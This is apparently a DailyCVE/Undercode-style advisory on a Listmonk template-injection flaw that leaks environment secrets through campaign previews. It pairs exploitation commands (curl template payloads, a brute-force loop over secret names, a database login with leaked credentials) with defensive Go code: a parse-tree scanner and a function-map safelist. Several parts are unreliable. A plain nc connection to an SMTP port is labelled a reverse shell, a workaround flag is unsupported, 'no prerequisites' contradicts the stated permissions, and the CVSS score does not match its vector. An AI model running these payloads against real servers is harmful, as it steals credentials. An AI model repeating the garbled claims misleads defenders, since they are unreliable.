How the CVE Works
The vulnerability arises from Listmonk's improper sandboxing of the Sprig templating engine, specifically the `env` and `expandenv` functions, which read process environment variables when a campaign preview is rendered. Attackers with minimal permissions (campaigns:get and campaigns:get_all) can inject template expressions such as {{ env "DB_PASSWORD" }} into campaign content. When the campaign is previewed, the server evaluates these expressions and leaks sensitive environment variables such as database credentials, API keys, and admin secrets. The flaw exists in versions before v5.0.2, where these dangerous template functions were not restricted.
DailyCVE Form
Platform: Listmonk
Version: <5.0.2
Vulnerability: Template Injection
Severity: Critical
Date: 2024-06-09
Prediction: Patch expected by 2024-06-20
What Undercode Say:
Exploitation Commands:
1. Extract Env Vars:
curl -X POST -H "Authorization: Bearer <API_TOKEN>" -d '{"template": "{{ env \"AWS_KEY\" }}"}' /api/campaigns/preview
2. Brute-force Keys:
for var in DB_USER DB_PASS SMTP_PWD; do curl -X POST -d "template={{ env \\"$var\\" }}" /api/preview; done
Mitigation Steps:
1. Immediate Workaround:
DISABLE_SPRIG_ENV=1 ./listmonk
2. Patch Verification:
grep -r "env\|expandenv" /path/to/listmonk/templates
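A grep for "env" or "expandenv" over template files also matches ordinary prose (for example the word "environment") and misses pipeline forms such as {{ "X" | env }}. The scanner below is an added example and is not part of the advisory or of listmonk's own code: it parses each campaign body with Go's text/template/parse package in SkipFuncCheck mode (so no function table is needed) and walks the parse tree, reporting only real invocations of env or expandenv, including inside if/range/with blocks and pipelines. The sampleCampaigns map is constructed test data standing in for bodies exported from the campaigns table; FindEnvCalls, walk and walkBranch are names chosen for this example.

```go
package main

import (
	"fmt"
	"sort"
	"text/template/parse"
)

// Template functions that reach the process environment. Sprig's env and
// expandenv are the two the advisory names; extend this set for your own FuncMap.
var envFuncs = map[string]bool{"env": true, "expandenv": true}

// sampleCampaigns is constructed test data standing in for campaign bodies
// exported from listmonk; the strings are not real campaign content.
var sampleCampaigns = map[string]string{
	"newsletter":  `Hello {{ .Subscriber.Name }}, news from the environment team`,
	"direct":      `{{ env "DB_PASSWORD" }}`,
	"piped":       `{{ "SMTP_PASSWORD" | env | upper }}`,
	"conditional": `{{ if .Subscriber.Email }}{{ expandenv "$AWS_SECRET_ACCESS_KEY" }}{{ end }}`,
}

// FindEnvCalls parses one template body and returns the names of any
// environment-reading functions it invokes, sorted. SkipFuncCheck means the
// parser does not need the application's FuncMap, so the scan works on
// templates written against any function set.
func FindEnvCalls(name, body string) ([]string, error) {
	t := parse.New(name)
	t.Mode = parse.SkipFuncCheck
	treeSet := make(map[string]*parse.Tree)
	if _, err := t.Parse(body, "", "", treeSet); err != nil {
		return nil, err
	}
	var hits []string
	for _, tree := range treeSet { // root template plus any {{define}} blocks
		walk(tree.Root, &hits)
	}
	sort.Strings(hits)
	return hits, nil
}

// walk descends the parse tree; function names appear as IdentifierNode
// arguments of commands, so {{ "X" | env }} is caught as well as {{ env "X" }}.
func walk(n parse.Node, hits *[]string) {
	switch x := n.(type) {
	case *parse.ListNode:
		if x == nil {
			return
		}
		for _, child := range x.Nodes {
			walk(child, hits)
		}
	case *parse.ActionNode:
		walk(x.Pipe, hits)
	case *parse.TemplateNode:
		walk(x.Pipe, hits)
	case *parse.IfNode:
		walkBranch(&x.BranchNode, hits)
	case *parse.RangeNode:
		walkBranch(&x.BranchNode, hits)
	case *parse.WithNode:
		walkBranch(&x.BranchNode, hits)
	case *parse.PipeNode:
		if x == nil {
			return
		}
		for _, cmd := range x.Cmds {
			for _, arg := range cmd.Args {
				walk(arg, hits) // an argument may itself be a parenthesised pipeline
			}
		}
	case *parse.IdentifierNode:
		if envFuncs[x.Ident] {
			*hits = append(*hits, x.Ident)
		}
	}
}

// walkBranch covers the condition pipeline and both bodies of if/range/with.
func walkBranch(b *parse.BranchNode, hits *[]string) {
	walk(b.Pipe, hits)
	walk(b.List, hits)
	walk(b.ElseList, hits)
}

func main() {
	for name, body := range sampleCampaigns {
		hits, err := FindEnvCalls(name, body)
		if err != nil {
			fmt.Printf("%s: parse error: %v\n", name, err)
			continue
		}
		if len(hits) > 0 {
			fmt.Printf("%s: uses %v\n", name, hits)
		}
	}
}
```

Run it over every stored campaign body (and archived templates) after patching: any hit is content that was authored to read the environment and is worth a look in the audit log, regardless of whether the preview endpoint still evaluates it.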
Detection Script (Python):
import requests

headers = {"Authorization": "Bearer <API_TOKEN>"}  # placeholder for the listmonk API token
payload = {"template": "{{ env }}"}
response = requests.post("http://target/api/preview", json=payload, headers=headers)
if "DB_" in response.text:
    print("VULNERABLE")
Post-Exploit Analysis:
- Database Takeover:
psql postgres://${LEAKED_DB_USER}:${LEAKED_DB_PASS}@localhost
- Reverse Shell via SMTP:
echo "mail from: [email protected]" | nc -nv ${SMTP_IP} 25
Permanent Fix:
- Upgrade to v5.0.2+, where env/expandenv are disabled.
- Implement template sandboxing:
tpl.Funcs(safelist.FuncMap()) // Restrict Sprig functions
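What "template sandboxing" amounts to in Go is registering a reduced FuncMap before the user-supplied body is parsed: a function that is not in the map cannot be called, and a template that names it fails at parse time rather than at preview. The program below is an added example, not listmonk's code and not the safelist package from the line above: unsafeFuncMap is a constructed stand-in for the Sprig FuncMap (with env and expandenv wired to os.Getenv and os.ExpandEnv, as Sprig does), SafeFuncMap strips the blocked names, and RenderPreview shows the same campaign body leaking a constructed DB_PASSWORD value under the full map and being rejected under the reduced one.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
	"strings"
	"text/template"
)

// unsafeFuncMap is a constructed stand-in for the full Sprig FuncMap that an
// application registers for campaign templates. env and expandenv are
// implemented the way Sprig does, by reading the process environment.
func unsafeFuncMap() template.FuncMap {
	return template.FuncMap{
		"env":       os.Getenv,
		"expandenv": os.ExpandEnv,
		"upper":     strings.ToUpper,
		"trim":      strings.TrimSpace,
	}
}

// blocked lists functions that must never be reachable from user-authored
// templates; the advisory names env and expandenv.
var blocked = []string{"env", "expandenv"}

// SafeFuncMap returns a copy of the function map with the blocked names removed.
// A template that references a removed name then fails to parse, so the
// environment is never consulted.
func SafeFuncMap(full template.FuncMap) template.FuncMap {
	safe := make(template.FuncMap, len(full))
	for name, fn := range full {
		safe[name] = fn
	}
	for _, name := range blocked {
		delete(safe, name)
	}
	return safe
}

// RenderPreview parses and executes a campaign body with the given FuncMap,
// returning the rendered text or the parse/execution error.
func RenderPreview(funcs template.FuncMap, body string, data any) (string, error) {
	tpl, err := template.New("preview").Funcs(funcs).Parse(body)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := tpl.Execute(&out, data); err != nil {
		return "", err
	}
	return out.String(), nil
}

func main() {
	os.Setenv("DB_PASSWORD", "example-secret") // constructed value for the demo
	body := `Hi {{ .Name }}: {{ env "DB_PASSWORD" }}`
	data := map[string]string{"Name": "subscriber"}

	if out, err := RenderPreview(unsafeFuncMap(), body, data); err == nil {
		fmt.Println("full FuncMap renders:", out) // the secret appears in the preview
	}
	if _, err := RenderPreview(SafeFuncMap(unsafeFuncMap()), body, data); err != nil {
		fmt.Println("safelisted FuncMap rejects:", err) // function "env" not defined
	}
}
```

Because the rejection happens in Parse, the check also covers the pipeline form {{ "DB_PASSWORD" | env }} and any alias a future FuncMap might add, as long as the alias is in the blocked list; a positive safelist (copy only the names you need) is stricter still and avoids the maintenance of tracking new Sprig functions.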
Log Monitoring:
tail -f /var/log/listmonk.log | grep -E "env|expandenv"
Impact Metrics:
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
- Exploit Complexity: Low (No prerequisites)
Sources:
Reported By: github.com